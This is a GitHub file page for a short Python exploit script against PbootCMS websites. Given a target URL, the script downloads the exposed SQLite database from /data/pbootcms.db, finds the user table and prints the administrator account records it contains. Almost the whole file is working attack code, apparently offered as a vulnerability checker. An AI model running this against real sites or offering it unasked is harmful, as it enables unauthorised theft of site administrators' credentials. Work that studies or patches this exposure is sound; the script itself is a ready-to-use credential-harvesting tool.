-
Notifications
You must be signed in to change notification settings - Fork 75
/
pbootcms-database-download.py
53 lines (45 loc) · 1.46 KB
/
pbootcms-database-download.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
#author: myh0st@xazlsec
import requests
import urllib3
import sqlite3
import sys
import time
import json
import re
urllib3.disable_warnings()
def get_user_pass():
connection = sqlite3.connect("pbootcms.db")
cursor = connection.cursor()
try:
cursor.execute("select name from sqlite_master where type='table';")
result = cursor.fetchall()
usertable = result[0][0]
#print(result)
for tablename in result:
if re.search("user$", tablename[0]):
usertable = tablename[0]
break
#print(usertable)
cursor.execute("select * from "+usertable+";")
return cursor.fetchall()
except:
print("Oops! Something wrong", sys.exc_info(), sql)
return []
def verify(site):
burp0_url = site + "/data/pbootcms.db"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept-Encoding": "gzip"}
r = requests.get(burp0_url, headers=burp0_headers, verify=False, timeout=20)
if r.status_code == 200 and "SQLite" in r.text:
with open("pbootcms.db", "wb") as code:
code.write(r.content)
return get_user_pass()
return ""
if __name__=="__main__":
target = sys.argv[1]
info = verify(target)
if info != "":
print("[+]漏洞存在,读取到的管理员账号信息为:", info)
else:
print("[-]漏洞不存在")